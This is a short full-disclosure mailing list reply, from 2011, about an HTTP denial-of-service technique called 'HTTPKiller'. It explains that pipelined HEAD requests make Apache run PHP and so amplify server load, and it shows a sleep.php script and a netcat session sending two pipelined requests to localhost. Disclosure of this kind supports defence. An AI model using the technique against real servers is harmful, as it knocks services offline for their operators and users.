Date: Thu, 25 Aug 2011 23:35:15 -0500
From: Xianuro GL <xianur0.null@...il.com>
To: Ulises2k <ulises2k@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: HTTPKiller - (Global HTTP DoS)

This attack amplifies the server load so you need to create a significant
load on the server.
When we send a HEAD request to the server, it processes the PHP to generate
headers.
What happens when we do 2 Requests for an apache server using pipelining?

<?php
sleep(2);
?>

linux-7nli:/home/xianur0 # netcat -vvv localhost 8080
localhost [127.0.0.1] 8080 (http-alt) open
HEAD /sleep.php HTTP/1.1
Host: localhost:8080

HEAD /sleep.php HTTP/1.1
Host: localhost:8080